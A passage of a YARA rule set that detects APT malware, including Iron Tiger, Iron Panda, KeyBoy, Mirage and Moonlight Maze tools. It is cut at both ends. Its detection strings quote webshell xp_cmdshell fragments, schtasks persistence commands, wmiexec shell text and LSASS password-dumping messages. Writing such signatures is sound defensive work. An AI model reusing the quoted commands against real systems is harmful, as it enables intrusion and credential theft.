    $mistake1 = "because of error, can not analysis" ascii wide nocase
    $mistake2 = "can not deal witn the error" ascii wide nocase
    $mistake3 = "the other retun one RST" ascii wide nocase
    $mistake4 = "Coversation produce one error" ascii wide nocase
    $mistake5 = "Program try to use the have deleted the buffer" ascii wide nocase
  condition:
    (uint16(0) == 23117) and ((any of ($str*)) or (any of ($mistake*)))
}

rule IronTiger_EFH3_encoder {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger EFH3 Encoder"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "EFH3 [HEX] [SRCFILE] [DSTFILE]" ascii wide nocase
    $str2 = "123.EXE 123.EFH" ascii wide nocase
    $str3 = "ENCODER: b[i]: = " ascii wide nocase
  condition:
    uint16(0) == 23117 and (any of ($str*))
}

rule IronTiger_GetPassword_x64 {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger Malware - GetPassword x64"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "(LUID ERROR)" ascii wide nocase
    $str2 = "Users\\K8team\\Desktop\\GetPassword" ascii wide nocase
    $str3 = "Debug x64\\GetPassword.pdb" ascii wide nocase
    $bla1 = "Authentication Package:" ascii wide nocase
    $bla2 = "Authentication Domain:" ascii wide nocase
    $bla3 = "* Password:" ascii wide nocase
    $bla4 = "Primary User:" ascii wide nocase
  condition:
    uint16(0) == 23117 and ((any of ($str*)) or (all of ($bla*)))
}

rule IronTiger_GetUserInfo {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger Malware - GetUserInfo"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "getuserinfo username" ascii wide nocase
    $str2 = "joe@joeware.net" ascii wide nocase
    $str3 = "If . specified for userid," ascii wide nocase
  condition:
    uint16(0) == 23117 and (any of ($str*))
}

rule IronTiger_Gh0stRAT_variant {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "This is a detection for a s.exe variant seen in Op. Iron Tiger"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "Game Over Good Luck By Wind" ascii wide nocase
    $str2 = "ReleiceName" ascii wide nocase
    $str3 = "jingtisanmenxiachuanxiao.vbs" ascii wide nocase
    $str4 = "Winds Update" ascii wide nocase
  condition:
    uint16(0) == 23117 and (any of ($str*))
}

rule IronTiger_GTalk_Trojan {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger Malware - GTalk Trojan"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "gtalklite.com" ascii wide nocase
    $str2 = "computer=%s&lanip=%s&uid=%s&os=%s&data=%s" ascii wide nocase
    $str3 = "D13idmAdm" ascii wide nocase
    $str4 = "Error: PeekNamedPipe failed with %i" ascii wide nocase
  condition:
    uint16(0) == 23117 and (2 of ($str*))
}

rule IronTiger_HTTPBrowser_Dropper {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger Malware - HTTPBrowser Dropper"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = ".dllUT" ascii wide nocase
    $str2 = ".exeUT" ascii wide nocase
    $str3 = ".urlUT" ascii wide nocase
  condition:
    uint16(0) == 23117 and (2 of ($str*))
}

rule IronTiger_HTTP_SOCKS_Proxy_soexe {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger Toolset - HTTP SOCKS Proxy soexe"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "listen SOCKET error." ascii wide nocase
    $str2 = "WSAAsyncSelect SOCKET error." ascii wide nocase
    $str3 = "new SOCKETINFO error!" ascii wide nocase
    $str4 = "Http/1.1 403 Forbidden" ascii wide nocase
    $str5 = "Create SOCKET error." ascii wide nocase
  condition:
    uint16(0) == 23117 and (3 of ($str*))
}

rule IronTiger_NBDDos_Gh0stvariant_dropper {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger Malware - NBDDos Gh0stvariant Dropper"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "This service can't be stoped." ascii wide nocase
    $str2 = "Provides support for media palyer" ascii wide nocase
    $str4 = "CreaetProcess Error" ascii wide nocase
    $bla1 = "Kill You" ascii wide nocase
    $bla2 = "%4.2f GB" ascii wide nocase
  condition:
    uint16(0) == 23117 and ((any of ($str*)) or (all of ($bla*)))
}

rule IronTiger_PlugX_DosEmulator {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger Malware - PlugX DosEmulator"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "Dos Emluator Ver" ascii wide nocase
    $str2 = "\\PIPE\\FASTDOS" ascii wide nocase
    $str3 = "FastDos.cpp" ascii wide nocase
    $str4 = "fail,error code = %d." ascii wide nocase
  condition:
    uint16(0) == 23117 and (any of ($str*))
}

rule IronTiger_PlugX_FastProxy {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger Malware - PlugX FastProxy"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "SAFEPROXY HTServerTimer Quit!" ascii wide nocase
    $str2 = "Useage: %s pid" ascii wide nocase
    $str3 = "%s PORT[%d] TO PORT[%d] SUCCESS!" ascii wide nocase
    $str4 = "p0: port for listener" ascii wide nocase
    $str5 = "\\users\\whg\\desktop\\plug\\" ascii wide nocase
    $str6 = "[+Y] cwnd : %3d, fligth:" ascii wide nocase
  condition:
    uint16(0) == 23117 and (any of ($str*))
}

rule IronTiger_PlugX_Server {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger Malware - PlugX Server"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "\\UnitFrmManagerKeyLog.pas" ascii wide nocase
    $str2 = "\\UnitFrmManagerRegister.pas" ascii wide nocase
    $str3 = "Input Name..." ascii wide nocase
    $str4 = "New Value#" ascii wide nocase
    $str5 = "TThreadRControl.Execute SEH!!!" ascii wide nocase
    $str6 = "\\UnitFrmRControl.pas" ascii wide nocase
    $str7 = "OnSocket(event is error)!" ascii wide nocase
    $str8 = "Make 3F Version Ok!!!" ascii wide nocase
    $str9 = "PELEASE DO NOT CHANGE THE DOCAMENT" ascii wide nocase
    $str10 = "Press [Ok] Continue Run, Press [Cancel] Exit" ascii wide nocase
  condition:
    uint16(0) == 23117 and (2 of ($str*))
}

rule IronTiger_ReadPWD86 {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger Malware - ReadPWD86"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "Fail To Load LSASRV" ascii wide nocase
    $str2 = "Fail To Search LSASS Data" ascii wide nocase
    $str3 = "User Principal" ascii wide nocase
  condition:
    uint16(0) == 23117 and (all of ($str*))
}

rule IronTiger_Ring_Gh0stvariant {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger Malware - Ring Gh0stvariant"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "RING RAT Exception" ascii wide nocase
    $str2 = "(can not update server recently)!" ascii wide nocase
    $str4 = "CreaetProcess Error" ascii wide nocase
    $bla1 = "Sucess!" ascii wide nocase
    $bla2 = "user canceled!" ascii wide nocase
  condition:
    uint16(0) == 23117 and ((any of ($str*)) or (all of ($bla*)))
}

rule IronTiger_wmiexec {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger Tool - wmi.vbs detection"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "Temp Result File , Change it to where you like" ascii wide nocase
    $str2 = "wmiexec" ascii wide nocase
    $str3 = "By. Twi1ight" ascii wide nocase
    $str4 = "[both mode] ,delay TIME to read result" ascii wide nocase
    $str5 = "such as nc.exe or Trojan" ascii wide nocase
    $str6 = "+++shell mode+++" ascii wide nocase
    $str7 = "win2008 fso has no privilege to delete file" ascii wide nocase
  condition:
    2 of ($str*)
}

rule IronPanda_DNSTunClient {
  meta:
    description = "Iron Panda malware DnsTunClient - file named.exe"
    author = "Florian Roth"
    reference = "https://goo.gl/E4qia9"
    date = "2015-09-16"
    score = 80
    hash = "a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431"
  strings:
    $s1 = "dnstunclient -d or -domain <domain>" ascii fullword
    $s2 = "dnstunclient -ip <server ip address>" ascii fullword
    $s3 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"\\Microsoft\\Windows\\PLA\\System\\Microsoft Windows\" /tr " ascii fullword
    $s4 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"Microsoft Windows\" /tr " ascii fullword
    $s5 = "taskkill /im conime.exe" ascii fullword
    $s6 = "\\dns control\\t-DNSTunnel\\DnsTunClient\\DnsTunClient.cpp" ascii fullword
    $s7 = "UDP error:can not bing the port(if there is unclosed the bind process?)" ascii fullword
    $s8 = "use error domain,set domain pls use -d or -domain mark(Current: %s,recv %s)" ascii fullword
    $s9 = "error: packet num error.the connection have condurt,pls try later" ascii fullword
    $s10 = "Coversation produce one error:%s,coversation fail" ascii fullword
    $s11 = "try to add many same pipe to select group(or mark is too easy)." ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 409600 and 2 of them) or 5 of them
}

rule IronPanda_Malware1 {
  meta:
    description = "Iron Panda Malware"
    author = "Florian Roth"
    reference = "https://goo.gl/E4qia9"
    date = "2015-09-16"
    hash = "a0cee5822ddf254c254a5a0b7372c9d2b46b088a254a1208cb32f5fe7eca848a"
  strings:
    $x1 = "activedsimp.dll" wide fullword
    $s1 = "get_BadLoginAddress" ascii fullword
    $s2 = "get_LastFailedLogin" ascii fullword
    $s3 = "ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED" ascii fullword
    $s4 = "get_PasswordExpirationDate" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 307200 and all of them
}

rule IronPanda_Webshell_JSP {
  meta:
    description = "Iron Panda Malware JSP"
    author = "Florian Roth"
    reference = "https://goo.gl/E4qia9"
    date = "2015-09-16"
    hash = "3be95477e1d9f3877b4355cff3fbcdd3589bb7f6349fd4ba6451e1e9d32b7fa6"
  strings:
    $s1 = "Bin_ExecSql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + Bin_TextBox_SaveP" ascii
    $s2 = "tc.Text=\"<a href=\\\"javascript:Bin_PostBack('zcg_ClosePM','\"+Bin_ToBase64(de.Key.ToString())+\"')\\\">Close</a>\";" ascii fullword
    $s3 = "Bin_ExecSql(\"IF OBJECT_ID('bin_temp')IS NOT NULL DROP TABLE bin_temp\");" ascii fullword
  condition:
    filesize < 337920 and 1 of them
}

rule IronPanda_Malware_Htran {
  meta:
    description = "Iron Panda Malware Htran"
    author = "Florian Roth"
    reference = "https://goo.gl/E4qia9"
    date = "2015-09-16"
    hash = "7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7"
  strings:
    $s1 = "[-] Gethostbyname(%s) error:%s" ascii fullword
    $s2 = "%s -<listen|tran|slave> <option> [-log logfile]" ascii fullword
    $s3 = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" ascii fullword
    $s4 = "[-] ERROR: Must supply logfile name." ascii fullword
    $s5 = "[SERVER]connection to %s:%d error" ascii fullword
    $s6 = "[+] Make a Connection to %s:%d...." ascii fullword
    $s7 = "[+] Waiting another Client on port:%d...." ascii fullword
    $s8 = "[+] Accept a Client on port %d from %s" ascii fullword
    $s9 = "[+] Make a Connection to %s:%d ......" ascii fullword
    $s10 = "cmshared_get_ptr_from_atom" ascii fullword
    $s11 = "_cmshared_get_ptr_from_atom" ascii fullword
    $s12 = "[+] OK! I Closed The Two Socket." ascii fullword
    $s13 = "[-] TransmitPort invalid." ascii fullword
    $s14 = "[+] Waiting for Client on port:%d ......" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 128000 and 3 of them) or 5 of them
}

rule IronPanda_Malware2 {
  meta:
    description = "Iron Panda Malware"
    author = "Florian Roth"
    reference = "https://goo.gl/E4qia9"
    date = "2015-09-16"
    hash = "a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91"
  strings:
    $s0 = "\\setup.exe" ascii fullword
    $s1 = "msi.dll.urlUT" ascii fullword
    $s2 = "msi.dllUT" ascii fullword
    $s3 = "setup.exeUT" ascii fullword
    $s4 = "/c del /q %s" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 184320 and all of them
}

rule IronPanda_Malware3 {
  meta:
    description = "Iron Panda Malware"
    author = "Florian Roth"
    reference = "https://goo.gl/E4qia9"
    date = "2015-09-16"
    hash = "5cd2af844e718570ae7ba9773a9075738c0b3b75c65909437c43201ce596a742"
  strings:
    $s0 = "PluginDeflater.exe" wide fullword
    $s1 = ".Deflated" wide fullword
    $s2 = "PluginDeflater" ascii fullword
    $s3 = "DeflateStream" ascii fullword
    $s4 = "CompressionMode" ascii fullword
    $s5 = "System.IO.Compression" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 10240 and all of them
}

rule IronPanda_Malware4 {
  meta:
    description = "Iron Panda Malware"
    author = "Florian Roth"
    reference = "https://goo.gl/E4qia9"
    date = "2015-09-16"
    hash = "0d6da946026154416f49df2283252d01ecfb0c41c27ef3bc79029483adc2240c"
  strings:
    $s0 = "TestPlugin.dll" wide fullword
    $s1 = "<a href='http://www.baidu.com'>aasd</a>" wide fullword
    $s2 = "Zcg.Test.AspxSpyPlugins" ascii fullword
    $s6 = "TestPlugin" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 10240 and all of them
}

rule rtf_Kaba_jDoe {
  meta:
    author = "@patrickrolsen"
    maltype = "APT.Kaba"
    filetype = "RTF"
    version = "0.1"
    description = "fe439af268cd3de3a99c21ea40cf493f, d0e0e68a88dce443b24453cc951cf55f, b563af92f144dea7327c9597d9de574e, and def0c9a4c732c3a1e8910db3f9451620"
    date = "2013-12-10"
  strings:
    $magic1 = { 7B 5C 72 74 30 31 }
    $magic2 = { 7B 5C 72 74 66 31 }
    $magic3 = { 7B 5C 72 74 78 61 33 }
    $author1 = { 4A 6F 68 6E 20 44 6F 65 }
    $author2 = { 61 75 74 68 6F 72 20 53 74 6F 6E 65 }
    $string1 = { 44 30 [16] 43 46 [23] 31 31 45 }
  condition:
    ($magic1 or $magic2 or $magic3 at 0) and all of ($author*) and $string1
}

rule TidePool_Malware {
  meta:
    description = "Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks"
    author = "Florian Roth"
    reference = "http://goo.gl/m2CXWR"
    date = "2016-05-24"
    hash1 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
    hash2 = "67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed"
    hash3 = "2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18"
    hash4 = "38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f"
    hash5 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
  strings:
    $x1 = "Content-Disposition: form-data; name=\"m1.jpg\"" ascii fullword
    $x2 = "C:\\PROGRA~2\\IEHelper\\mshtml.dll" wide fullword
    $x3 = "C:\\DOCUME~1\\ALLUSE~1\\IEHelper\\mshtml.dll" wide fullword
    $x4 = "IEComDll.dat" ascii fullword
    $s1 = "Content-Type: multipart/form-data; boundary=----=_Part_%x" wide fullword
    $s2 = "C:\\Windows\\System32\\rundll32.exe" wide fullword
    $s3 = "network.proxy.socks_port\", " ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and (1 of ($x*))) or (4 of them)
}

rule KeyBoy_Dropper {
  meta:
    Author = "Rapid7 Labs"
    Date = "2013/06/07"
    Description = "Strings inside"
    Reference = "https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india"
  strings:
    $1 = "I am Admin"
    $2 = "I am User"
    $3 = "Run install success!"
    $4 = "Service install success!"
    $5 = "Something Error!"
    $6 = "Not Configed, Exiting"
  condition:
    all of them
}

rule KeyBoy_Backdoor {
  meta:
    Author = "Rapid7 Labs"
    Date = "2013/06/07"
    Description = "Strings inside"
    Reference = "https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india"
  strings:
    $1 = "$login$"
    $2 = "$sysinfo$"
    $3 = "$shell$"
    $4 = "$fileManager$"
    $5 = "$fileDownload$"
    $6 = "$fileUpload$"
  condition:
    all of them
}

rule new_keyboy_export {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Matches the new 2016 sample's export"
    date = "2016-08-28"
    md5 = "495adb1b9777002ecfe22aaf52fcee93"
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and filesize < 204800 and pe.exports("cfsUpdate")
}

rule new_keyboy_header_codes {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Matches the 2016 sample's header codes"
    date = "2016-08-28"
    md5 = "495adb1b9777002ecfe22aaf52fcee93"
  strings:
    $s1 = "*l*" wide fullword
    $s2 = "*a*" wide fullword
    $s3 = "*s*" wide fullword
    $s4 = "*d*" wide fullword
    $s5 = "*f*" wide fullword
    $s6 = "*g*" wide fullword
    $s7 = "*h*" wide fullword
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and filesize < 204800 and all of them
}

rule keyboy_commands {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Matches the 2016 sample's sent and received commands"
    date = "2016-08-28"
    md5 = "495adb1b9777002ecfe22aaf52fcee93"
  strings:
    $s1 = "Update" wide fullword
    $s2 = "UpdateAndRun" wide fullword
    $s3 = "Refresh" wide fullword
    $s4 = "OnLine" wide fullword
    $s5 = "Disconnect" wide fullword
    $s6 = "Pw_Error" wide fullword
    $s7 = "Pw_OK" wide fullword
    $s8 = "Sysinfo" wide fullword
    $s9 = "Download" wide fullword
    $s10 = "UploadFileOk" wide fullword
    $s11 = "RemoteRun" wide fullword
    $s12 = "FileManager" wide fullword
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and filesize < 204800 and 6 of them
}

rule keyboy_errors {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Matches the sample's shell error2 log statements"
    date = "2016-08-28"
    md5 = "495adb1b9777002ecfe22aaf52fcee93"
  strings:
    $error = "Error2" ascii wide
    $s1 = "Can't find [%s]!Check the file name and try again!" ascii wide
    $s2 = "Open [%s] error! %d" ascii wide
    $s3 = "The Size of [%s] is zero!" ascii wide
    $s4 = "CreateThread DownloadFile[%s] Error!" ascii wide
    $s5 = "UploadFile [%s] Error:Connect Server Failed!" ascii wide
    $s6 = "Receive [%s] Error(Recved[%d] != Send[%d])!" ascii wide
    $s7 = "Receive [%s] ok! Use %2.2f seconds, Average speed %2.2f k/s" ascii wide
    $s8 = "CreateThread UploadFile[%s] Error!" ascii wide
    $s9 = "Ready Download [%s] ok!" ascii wide
    $s10 = "Get ControlInfo from FileClient error!" ascii wide
    $s11 = "FileClient has a error!" ascii wide
    $s12 = "VirtualAlloc SendBuff Error(%d)" ascii wide
    $s13 = "ReadFile [%s] Error(%d)..." ascii wide
    $s14 = "ReadFile [%s] Data[Readed(%d) != FileSize(%d)] Error..." ascii wide
    $s15 = "CreateThread DownloadFile[%s] Error!" ascii wide
    $s16 = "RecvData MyRecv_Info Size Error!" ascii wide
    $s17 = "RecvData MyRecv_Info Tag Error!" ascii wide
    $s18 = "SendData szControlInfo_1 Error!" ascii wide
    $s19 = "SendData szControlInfo_3 Error!" ascii wide
    $s20 = "VirtualAlloc RecvBuff Error(%d)" ascii wide
    $s21 = "RecvData Error!" ascii wide
    $s22 = "WriteFile [%s} Error(%d)..." ascii wide
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and filesize < 204800 and $error and 3 of ($s*)
}

rule keyboy_systeminfo {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Matches the system information format before sending to C2"
    date = "2016-08-28"
    md5 = "495adb1b9777002ecfe22aaf52fcee93"
  strings:
    $s1 = "SystemVersion:    %s" ascii wide
    $s2 = "Product  ID:      %s" ascii wide
    $s3 = "InstallPath:      %s" ascii wide
    $s4 = "InstallTime:      %d-%d-%d, %02d:%02d:%02d" ascii wide
    $s5 = "ResgisterGroup:   %s" ascii wide
    $s6 = "RegisterUser:     %s" ascii wide
    $s7 = "ComputerName:     %s" ascii wide
    $s8 = "WindowsDirectory: %s" ascii wide
    $s9 = "System Directory: %s" ascii wide
    $s10 = "Number of Processors:       %d" ascii wide
    $s11 = "CPU[%d]:  %s: %sMHz" ascii wide
    $s12 = "RAM:         %dMB Total, %dMB Free." ascii wide
    $s13 = "DisplayMode: %d x %d, %dHz, %dbit" ascii wide
    $s14 = "Uptime:      %d Days %02u:%02u:%02u" ascii wide
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and filesize < 204800 and 7 of them
}

rule keyboy_related_exports {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Matches the new 2016 sample's export"
    date = "2016-08-28"
    md5 = "495adb1b9777002ecfe22aaf52fcee93"
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and filesize < 204800 and pe.exports("Embedding") or pe.exports("SSSS") or pe.exports("GetUP")
}

rule keyboy_init_config_section {
  meta:
    author = "Matt Brooks, @cmatthewbrooks"
    desc = "Matches the Init section where the config is stored"
    date = "2016-08-28"
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and filesize < 307200 and for any i in (0..pe.number_of_sections - 1) : (pe.sections[i].name == ".Init" and pe.sections[i].virtual_size % 1024 == 0)
}

rule EliseLotusBlossom {
  meta:
    author = "Jose Ramon Palanco"
    date = "2015-06-23"
    description = "Elise Backdoor Trojan"
    ref = "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html"
  strings:
    $magic = { 4D 5A }
    $s1 = "\",Update" wide
    $s2 = "LoaderDLL.dll"
    $s3 = "Kernel32.dll"
    $s4 = "{5947BACD-63BF-4e73-95D7-0C8A98AB95F2}"
    $s5 = "\\Network\\" wide
    $s6 = "0SSSSS"
    $s7 = "441202100205"
    $s8 = "0WWWWW"
  condition:
    $magic at 0 and all of ($s*)
}

rule MiniDionis_readerView {
  meta:
    description = "MiniDionis Malware - file readerView.exe / adobe.exe"
    author = "Florian Roth"
    reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
    date = "2015-07-20"
    hash1 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
    hash2 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
    hash3 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
    hash4 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
    hash5 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
    hash6 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
  strings:
    $s1 = "%ws_out%ws" wide fullword
    $s2 = "dnlibsh" ascii fullword
    $op0 = { 0F B6 80 68 0E 41 00 0B C8 C1 E1 08 0F B6 C2 8B }
    $op1 = { 8B CE E8 F8 01 00 00 85 C0 74 41 83 7D F8 00 0F }
    $op2 = { E8 2F A2 FF FF 83 20 00 83 C8 FF 5F 5E 5D C3 55 }
  condition:
    uint16(0) == 23117 and filesize < 512000 and all of ($s*) and 1 of ($op*)
}

rule Malicious_SFX1 {
  meta:
    description = "SFX with voicemail content"
    author = "Florian Roth"
    reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
    date = "2015-07-20"
    hash = "c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f"
  strings:
    $s0 = "voicemail" ascii
    $s1 = ".exe" ascii
  condition:
    uint16(0) == 19280 and filesize < 1024000 and $s0 in (3..80) and $s1 in (3..80)
}

rule Malicious_SFX2 {
  meta:
    description = "SFX with adobe.exe content"
    author = "Florian Roth"
    reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
    date = "2015-07-20"
    hash = "502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d"
  strings:
    $s1 = "adobe.exe" ascii fullword
    $s2 = "Extracting files to %s folder$Extracting files to temporary folder" wide fullword
    $s3 = "GETPASSWORD1" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and all of them
}

rule MiniDionis_VBS_Dropped {
  meta:
    description = "Dropped File - 1.vbs"
    author = "Florian Roth"
    reference = "https://malwr.com/analysis/ZDc4ZmIyZDI4MTVjNGY5NWI0YzE3YjIzNGFjZTcyYTY/"
    date = "2015-07-21"
    hash = "97dd1ee3aca815eb655a5de9e9e8945e7ba57f458019be6e1b9acb5731fa6646"
  strings:
    $s1 = "Wscript.Sleep 5000" ascii
    $s2 = "Set FSO = CreateObject(\"Scripting.FileSystemObject\")" ascii
    $s3 = "Set WshShell = CreateObject(\"WScript.Shell\")" ascii
    $s4 = "If(FSO.FileExists(\"" ascii
    $s5 = "then FSO.DeleteFile(\".\\" ascii
  condition:
    filesize < 1024 and all of them and $s1 in (0..40)
}

rule MirageStrings {
  meta:
    description = "Mirage Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  strings:
    $ = "Neo,welcome to the desert of real." ascii wide
    $ = "/result?hl=en&id=%s"
  condition:
    any of them
}

rule Mirage {
  meta:
    description = "Mirage"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  condition:
    MirageStrings
}

rule Mirage_APT {
  meta:
    Author = "Silas Cutler"
    Date = "yyyy/mm/dd"
    Description = "Malware related to APT campaign"
    Reference = "Useful link"
  strings:
    $a1 = "welcome to the desert of the real"
    $a2 = "Mirage"
    $b = "Encoding: gzip"
    $c = /\/[A-Za-z]*\?hl=en/
  condition:
    (($a1 or $a2) or $b) and $c
}

rule Molerats_certs {
  meta:
    Author = "FireEye Labs"
    Date = "2013/08/23"
    Description = "this rule detections code signed with certificates used by the Molerats actor"
    Reference = "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html"
  strings:
    $cert1 = { 06 50 11 A5 BC BF 83 C0 93 28 16 5E 7E 85 27 75 }
    $cert2 = { 03 E1 E1 AA A5 BC A1 9F BA 8C 42 05 8B 4A BF 28 }
    $cert3 = { 0C C0 35 9C 9C 3C DA 00 D7 E9 DA 2D C6 BA 7B 6D }
  condition:
    1 of ($cert*)
}

rule Backdoor_APT_Mongal {
  meta:
    author = "@patrickrolsen"
    maltype = "Backdoor.APT.Mongall"
    version = "0.1"
    reference = "fd69a799e21ccb308531ce6056944842"
    date = "01/04/2014"
  strings:
    $author = "author user"
    $title = "title Vjkygdjdtyuj" nocase
    $comp = "company ooo"
    $cretime = "creatim\\yr2012\\mo4\\dy19\\hr15\\min10"
    $passwd = "password 00000000"
  condition:
    all of them
}

rule MongalCode {
  meta:
    description = "Mongal code features"
    author = "Seth Hardy"
    last_modified = "2014-07-15"
  strings:
    $ = { 8B C8 B8 D3 4D 62 10 F7 E1 C1 EA 06 2B D6 83 FA 05 76 EB }
  condition:
    any of them
}

rule MongalStrings {
  meta:
    description = "Mongal Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-07-15"
  strings:
    $ = "NSCortr.dll"
    $ = "NSCortr1.dll"
    $ = "Sina.exe"
  condition:
    any of them
}

rule Mongal {
  meta:
    description = "Mongal"
    author = "Seth Hardy"
    last_modified = "2014-07-15"
  condition:
    MongalCode or MongalStrings
}

rule apt_RU_MoonlightMaze_customlokitools {
  meta:
    author = "Kaspersky Lab"
    date = "2017-03-15"
    version = "1.1"
    last_modified = "2017-03-22"
    reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
    description = "Rule to detect Moonlight Maze Loki samples by custom attacker-authored strings"
    hash = "14cce7e641d308c3a177a8abb5457019"
    hash = "a3164d2bbc45fb1eef5fde7eb8b245ea"
    hash = "dabee9a7ea0ddaf900ef1e3e166ffe8a"
    hash = "1980958afffb6a9d5a6c73fc1e2795c2"
    hash = "e59f92aadb6505f29a9f368ab803082e"
  strings:
    $a1 = "Write file Ok..." ascii wide
    $a2 = "ERROR: Can not open socket...." ascii wide
    $a3 = "Error in parametrs:" ascii wide
    $a4 = "Usage: @<get/put> <IP> <PORT> <file>" ascii wide
    $a5 = "ERROR: Not connect..." ascii wide
    $a6 = "Connect successful...." ascii wide
    $a7 = "clnt <%d> rqstd n ll kll" ascii wide
    $a8 = "clnt <%d> rqstd swap" ascii wide
    $a9 = "cld nt sgnl prcs grp" ascii wide
    $a10 = "cld nt sgnl prnt" ascii wide
    $a11 = "ork error" ascii fullword
  condition:
    ((any of ($a*)))
}

rule apt_RU_MoonlightMaze_customsniffer {
  meta:
    author = "Kaspersky Lab"
    date = "2017-03-15"
    version = "1.1"
    reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
    description = "Rule to detect Moonlight Maze sniffer tools"
    hash = "7b86f40e861705d59f5206c482e1f2a5"
    hash = "927426b558888ad680829bd34b0ad0e7"
    original_filename = "ora;tdn"
  strings:
    $a1 = "/var/tmp/gogo" fullword
    $a2 = "myfilename= |%s|" fullword
    $a3 = "mypid,mygid=" fullword
    $a4 = "mypid=|%d| mygid=|%d|" fullword
    $a5 = "/var/tmp/task" fullword
    $a6 = "mydevname= |%s|" fullword
  condition:
